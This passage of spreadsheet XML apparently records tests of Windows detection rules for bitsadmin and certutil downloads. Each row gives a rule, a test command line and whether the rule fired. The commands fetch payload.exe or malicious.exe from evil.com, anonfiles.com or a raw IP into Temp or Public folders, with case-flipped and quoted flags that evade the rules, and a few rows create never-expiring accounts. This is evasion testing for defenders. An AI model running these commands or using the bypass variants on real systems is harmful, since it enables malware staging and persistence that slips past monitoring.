      <c r="I520" s="43" t="n"/>
      <c r="J520" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K520" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="521" ht="15.75" customHeight="1" s="42">
      <c r="A521" s="43" t="n"/>
      <c r="B521" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_direct_ip</t>
        </is>
      </c>
      <c r="C521" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From Direct IP Via Bitsadmin</t>
        </is>
      </c>
      <c r="D521" s="36" t="inlineStr">
        <is>
          <t>99c840f2-2012-46fd-9141-c761987550ef</t>
        </is>
      </c>
      <c r="E521" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /tRANSfEr downloadJob http://010.0.0.1/malicious.exe C:\Windows\Temp\malicious.exe</t>
        </is>
      </c>
      <c r="F521" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G521" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H521" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I521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521" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K521" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="522" ht="15.75" customHeight="1" s="42">
      <c r="A522" s="43" t="n"/>
      <c r="B522" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C522" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D522" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E522" s="36" t="inlineStr">
        <is>
          <t>certutil -urlcache -split -f https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F522" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G522" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H522" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I522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2" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K522" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="523" ht="15.75" customHeight="1" s="42">
      <c r="A523" s="43" t="n"/>
      <c r="B523" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C523" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D523" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E523" s="36" t="inlineStr">
        <is>
          <t>certutil -UrlCache /"split" -f https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F523" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G523" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H523" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I523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3" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K523" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="524" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A524" s="43" t="n"/>
      <c r="B524" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C524" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D524" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E524" s="36" t="inlineStr">
        <is>
          <t>certutil -URLCaCHE -split -F https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F524" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G524" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H524" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I524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4" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K524" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="525" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A525" s="43" t="n"/>
      <c r="B525" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C525" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D525" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E525" s="36" t="inlineStr">
        <is>
          <t>certutil -urlcache -split /"f" https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F525" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G525" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H525" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I525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5" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K525" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="526" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A526" s="43" t="n"/>
      <c r="B526" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C526" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D526" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E526" s="36" t="inlineStr">
        <is>
          <t>certutil -UrlCAChE -split -f https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F526" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G526" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H526" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I526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6" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K526" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="527" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A527" s="43" t="n"/>
      <c r="B527" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C527" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D527" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E527" s="36" t="inlineStr">
        <is>
          <t>certutil /"urlcache" -SplIt -"f" https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F527" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G527" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H527" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I527" s="36" t="n"/>
      <c r="J527" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K527" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="528" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A528" s="43" t="n"/>
      <c r="B528" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C528" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D528" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E528" s="36" t="inlineStr">
        <is>
          <t>certutil -UrlCAcHE -split -F https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F528" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G528" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H528" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I528" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE (42a5f1e7-9603-4f6d-97ae-3f37d130d794); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J528" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K528" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="529" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A529" s="43" t="n"/>
      <c r="B529" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C529" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D529" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E529" s="36" t="inlineStr">
        <is>
          <t>certutil /"urlcache" -"split" -f https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F529" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G529" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H529" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I529" s="36" t="n"/>
      <c r="J529" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K529" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="530" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A530" s="43" t="n"/>
      <c r="B530" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C530" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D530" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E530" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-LocalUser -Name 'guest' -PasswordNeverExpires $true"</t>
        </is>
      </c>
      <c r="F530" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G530" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H530" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I530" s="43" t="n"/>
      <c r="J530" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K530" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="531" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A531" s="36" t="inlineStr">
        <is>
          <t>t1136.001</t>
        </is>
      </c>
      <c r="B531" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_user_add_never_expire</t>
        </is>
      </c>
      <c r="C531" s="36" t="inlineStr">
        <is>
          <t>New User Created Via Net.EXE With Never Expire Option</t>
        </is>
      </c>
      <c r="D531" s="36" t="inlineStr">
        <is>
          <t>b9f0e6f5-09b4-4358-bae4-08408705bd5c</t>
        </is>
      </c>
      <c r="E531" s="36" t="inlineStr">
        <is>
          <t>net "user" /add AtomicOperator$ At0micRedTeam! /expires:never</t>
        </is>
      </c>
      <c r="F531" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G531" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H531" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I531" s="43" t="inlineStr">
        <is>
          <t>New User Created Via Net.EXE With Never Expire Option (b9f0e6f5-09b4-4358-bae4-08408705bd5c); New User Created Via Net.EXE With Never Expire Option (b9f0e6f5-09b4-4358-bae4-08408705bd5c); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc)</t>
        </is>
      </c>
      <c r="J531" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K531" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="532" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A532" s="43" t="n"/>
      <c r="B532" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C532" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D532" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E532" s="36" t="inlineStr">
        <is>
          <t>certutil -UrlcACHe /"split" -f https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F532" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G532" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H532" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I532" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE (42a5f1e7-9603-4f6d-97ae-3f37d130d794); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J532" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K532" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="533" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A533" s="43" t="n"/>
      <c r="B533" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C533" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D533" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E533" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myjob /download /priority normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F533" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G533" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H533" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I533" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J533" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K533" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="534" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A534" s="43" t="n"/>
      <c r="B534" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C534" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D534" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E534" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myjob -"download" -"priority" normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F534" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G534" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H534" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I534" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J534" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K534" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="535" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A535" s="43" t="n"/>
      <c r="B535" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C535" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D535" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E535" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /tRansFeR myjob /download /PRioRITY normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F535" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G535" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H535" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I535" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J535" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K535" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="536" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A536" s="43" t="n"/>
      <c r="B536" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C536" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D536" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E536" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myjob /"download" /PriOrIty normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F536" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G536" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H536" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I536" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J536" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K536" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="537" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A537" s="43" t="n"/>
      <c r="B537" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_direct_ip</t>
        </is>
      </c>
      <c r="C537" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From Direct IP Via Bitsadmin</t>
        </is>
      </c>
      <c r="D537" s="36" t="inlineStr">
        <is>
          <t>99c840f2-2012-46fd-9141-c761987550ef</t>
        </is>
      </c>
      <c r="E537" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /tRAnsfER downloadJob http://010.0.0.1/malicious.exe C:\Windows\Temp\malicious.exe</t>
        </is>
      </c>
      <c r="F537" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G537" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H537" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I537" s="4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537" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K537" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="538" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A538" s="43" t="n"/>
      <c r="B538" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C538" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D538" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E538" s="36" t="inlineStr">
        <is>
          <t>bitsadmin -"transfer" myjob /"download" /priority normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F538" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G538" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H538" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I538" s="36" t="n"/>
      <c r="J538" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K538" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="539" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A539" s="43" t="n"/>
      <c r="B539" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C539" s="43" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D539" s="43" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E539" s="43" t="inlineStr">
        <is>
          <t>bitsadmin /tranSFEr myjob /download /priority normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F539" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G539" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H539" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I539" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J539" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K539" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="540" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A540" s="36" t="n"/>
      <c r="B540" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C540" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D540" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E540" s="43" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myjob /download /"priority" normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F540" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G540" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H540" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I540" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J540" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K540" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="541" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A541" s="43" t="n"/>
      <c r="B541" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C541" s="43" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D541" s="43" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E541" s="43" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myjob /download -"priority" normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F541" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G541" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H541" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I541" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J541" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K541" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="542" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A542" s="43" t="n"/>
      <c r="B542" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C542" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D542" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E542" s="36" t="inlineStr">
        <is>
          <t>certutil -"urlcache" /"split" -f https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F542" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G542" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H542" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I542" s="43" t="n"/>
      <c r="J542" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K542" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="543" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A543" s="43" t="n"/>
      <c r="B543" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C543" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D543" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E543" s="36" t="inlineStr">
        <is>
          <t>certutil -uRLCAChe -"split" -f https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F543" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G543" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H543" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I543" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE (42a5f1e7-9603-4f6d-97ae-3f37d130d794); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J543" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K543" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="544" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A544" s="43" t="n"/>
      <c r="B544" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C544" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D544" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E544" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /TraNSFEr myjob /dowNlOad /priority normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F544" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G544" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H544" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I544" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J544" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K544" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="545" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A545" s="36" t="n"/>
      <c r="B545" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C545" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D545" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E545" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob /doWnLOaD /pRIoRitY high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F545" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G545" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H545" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I545" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J545" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K545" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="546" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A546" s="36" t="n"/>
      <c r="B546" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C546" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
